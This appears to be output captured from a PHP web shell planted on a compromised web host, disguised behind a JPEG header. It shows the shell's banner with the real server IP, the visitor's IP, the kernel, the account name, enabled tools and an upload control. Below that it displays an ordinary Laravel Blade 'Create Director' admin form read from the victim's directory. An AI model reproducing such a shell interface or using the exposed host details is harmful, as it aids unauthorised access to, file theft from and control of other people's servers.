����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 3.143.214.100 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/gle.gltechlimited.com/resources/views/admin/director/ |
Upload File : |
@extends('layouts.master') @section('title',__('Create Director')) @section('breadcum') <div class="breadcrumbbar"> <h4 class="page-title">{{ __('Create Director') }}</h4> <div class="breadcrumb-list"> <ol class="breadcrumb"> <li class="breadcrumb-item"><a href="{{url('/admin')}}" title="{{ __('Dashboard') }}">{{ __('Dashboard') }}</a></li> <li class="breadcrumb-item active" aria-current="page">{{ __('Create Director') }}</li> </ol> </div> </div> @endsection @section('maincontent') <div class="contentbar"> <div class="row"> @if ($errors->any()) <div class="alert alert-danger" role="alert"> @foreach($errors->all() as $error) <p>{{ $error}}<button type="button" class="close" data-dismiss="alert" aria-label="Close" title="{{ __('Close') }}"> <span aria-hidden="true" style="color:red;">×</span></button></p> @endforeach </div> @endif <div class="col-lg-12"> <div class="card m-b-50"> <div class="card-header"> <a href="{{url('admin/directors')}}" class="float-right btn btn-primary-rgba mr-2" title="{{ __('Back') }}"><i class="feather icon-arrow-left mr-2"></i>{{ __('Back') }}</a> <h5 class="box-title">{{__('Create Director')}}</h5> </div> <div class="card-body ml-2"> {!! Form::open(['method' => 'POST', 'action' => 'DirectorController@store', 'files' => true]) !!} <div class="bg-info-rgba p-4 mb-4 rounded"> <div class="row"> <div class="col-lg-3 col-md-4"> <div class="form-group text-dark{{ $errors->has('name') ? ' has-error' : '' }}"> {!! Form::label('name',__('Director Name')) !!}<sup class="text-danger">*</sup> {!! Form::text('name', old('name'), ['class' => 'form-control', 'required' => 'required', 'placeholder' => __('Please enter director name')]) !!} <small class="text-danger">{{ $errors->first('name') }}</small> </div> </div> <div class="col-lg-2 col-md-4"> <div class="form-group text-dark{{ $errors->has('DOB') ? ' has-error' : '' }}"> {!! Form::label('DOB', __('Date of Birth')) !!}<sup class="text-danger">*</sup> {!! Form::date('DOB', old('DOB'), ['class' => 'form-control','placeholder' => __('Please enter date of birth')]) !!} <small class="text-danger">{{ $errors->first('DOB') }}</small> </div> </div> <div class="col-lg-3 col-md-4"> <div class="form-group text-dark{{ $errors->has('place_of_birth') ? ' has-error' : '' }}"> {!! Form::label('place_of_birth', __('Place of Birth')) !!}<sup class="text-danger">*</sup> {!! Form::text('place_of_birth', old('place_of_birth'), ['class' => 'form-control','row'=>'1', 'placeholder' => __('Please enter place of birth')]) !!} <small class="text-danger">{{ $errors->first('place_of_birth') }}</small> </div> </div> <div class="col-lg-4 col-md-4"> <div class="form-group text-dark{{ $errors->has('image') ? ' has-error' : '' }} input-file-block"> {!! Form::label('image', __('Director Image')) !!} <sup class="text-danger">*</sup> {!! Form::file('image', ['class' => 'input-file', 'id'=>'image','accept'=>'image/*']) !!} <small class="text-danger">{{ $errors->first('image') }}</small> </div> </div> <div class="col-lg-12 col-md-4"> <div class="form-group text-dark{{ $errors->has('biography') ? ' has-error' : '' }}"> {!! Form::label('biography', __('Director Biography')) !!}<sup class="text-danger">*</sup> {!! Form::textarea('biography', old('biography'), ['class' => 'form-control','row'=>'1', 'placeholder' => __('Please Enter Director Biography')]) !!} <small class="text-danger">{{ $errors->first('biography') }}</small> </div> </div> </div> </div> <div class="form-group"> <button type="reset" class="btn btn-success-rgba" title="{{__('Reset')}}">{{__('Reset')}}</button> <button type="submit" class="btn btn-primary-rgba" title="{{ __('Create') }}"><i class="fa fa-check-circle"></i> {{ __('Create') }}</button> </div> {!! Form::close() !!} <div class="clear-both"></div> </div> </div> </div> </div> </div> @endsection @section('script') @endsection